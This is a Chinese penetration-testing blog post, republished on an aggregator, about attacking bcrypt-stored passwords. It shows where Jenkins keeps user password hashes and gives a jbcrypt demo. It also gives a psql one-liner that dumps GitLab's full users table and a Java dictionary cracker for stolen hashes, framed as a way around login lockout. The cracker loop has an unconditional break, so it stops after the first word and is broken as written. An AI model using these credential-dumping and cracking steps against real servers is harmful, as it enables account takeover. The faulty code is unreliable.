美文网首页
【渗透笔记】BCrypt实战两则

【渗透笔记】BCrypt实战两则

作者: RabbitMask | 来源:发表于2020-07-01 11:39 被阅读0次

    Jenkins 用户密码加密

    $JENKINS_HOME/users/users.xml

    <entry>
     <string>admin</string>
     <string>admin_6666666666666666</string>
</entry>

    $JENKINS_HOME/admin_6666666666666666/config.xml
    passwordHash 节点可以看到用户密码加密后的密文哈希值:

        <hudson.security.HudsonPrivateSecurityRealm_-Details>
      <passwordHash>#jbcrypt:$2a$10$3fcowsyU5CsgeUywbAjZkuXlN4NVdfLu9bYxNx5RvJ9.9CyOzatDu</passwordHash>
    </hudson.security.HudsonPrivateSecurityRealm_-Details>

    其加密采用jbcrypt完成,jbcrypt 是 bcrypt 加密工具的 java 实现。

    package com.test.jenkins;
import org.mindrot.jbcrypt.BCrypt;

public class Jenkins {

    public static void main(String[] args)
    {
        //加密
        String hashed = BCrypt.hashpw("123456", BCrypt.gensalt());
        System.out.println(hashed);

        //解密
        if (BCrypt.checkpw("111111", hashed))
            System.out.println("密码正确");
        else
            System.out.println("密码错误");
    }
}

    <!-- https://mvnrepository.com/artifact/org.mindrot/jbcrypt -->
<dependency>
    <groupId>org.mindrot</groupId>
    <artifactId>jbcrypt</artifactId>
    <version>0.4</version>
</dependency>
    • 用 jbcrypt 对同一个明文加密后因为 salt 一般不同,加密后的密文一般不同,且bcrypt 是不可逆的加密算法,无法通过解密密文得到明文。
    • bcrypt 和其他对称或非对称加密方式不同的是,不是直接解密得到明文,也不是二次加密比较密文,而是把明文和存储的密文一块运算得到另一个密文,如果这两个密文相同则验证成功。

    Gitlab 用户密码解密

    在《Gitlab 本地db_dump》章节我们已经提到过如何快速脱裤了:
    sudo -i -u gitlab-psql bash -c "echo 'select * from users;' |psql -h /var/opt/gitlab/postgresql -d gitlabhq_production > /tmp/user_dump.txt"
    Gitlab用户加密同样采用了BCrypt作为加密策略,BCrypt虽然无法逆向解密,但我们依然可以按照它的密码验证逻辑来进行本地字典爆破,Gitlab前端存在一个密码错误十次账户锁定的防爆破机制。

    package com.test.gitlab;

import org.mindrot.jbcrypt.BCrypt;

import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.ArrayList;
import java.util.List;

public class Gitlab {

    public static void main(String[] args) {
        //密文
        String hashed = "$2a$10$3fcowsyU5CsgeUywbAjZkuXlN4NVdfLu9bYxNx5RvJ9.9CyOzatDu";
        //字典
        List<String> pass = readTxt("src/main/java/com/test/gitlab/100.txt");

        assert pass != null;
        for (Object o : pass) {
            if (BCrypt.checkpw((String) o, hashed))
                System.out.println("爆破成功,密码为:" + o);
            break;
        }

    }

    //读取TXT返回列表形式
    public static List<String> readTxt(String filePath) {
        List<String> fileList = new ArrayList<>();
        try {
            fileList = Files.readAllLines(Paths.get(filePath));
        } catch (IOException e) {
            e.printStackTrace();
        }
        return fileList;
    }
}

    相关文章

      网友评论

          本文标题:【渗透笔记】BCrypt实战两则

          本文链接:https://www.haomeiwen.com/subject/uescqktx.html

          延伸阅读

          深度阅读

          • 您也可以注册成为美文阅读网的作者,发表您的原创作品、分享您的心情!

          栏目导航

          热点阅读

          关于我们|服务条款|联系我们|【渗透笔记】BCrypt实战两则|投稿指南|网站地图|RSS订阅|排版工具|手机版

          提供经典美文摘抄,优美散文欣赏,现代诗歌精选,短篇小说,心情随笔,表白情书范文,故事会在线阅读欣赏

          Copyright © 2014-2023 Haomeiwen.com All Rights Reserved. 好美文阅读网 版权所有

          备案信息:桂公网安备 45052102000051号 · 桂ICP备13007215号-3

          本站所收录作品、热点评论等信息部分来源互联网,目的只是为了系统归纳学习和传递资讯

          所有作品版权归原创作者所有,与本站立场无关,如不慎侵犯了你的权益,请联系我们告知,我们将做删除处理!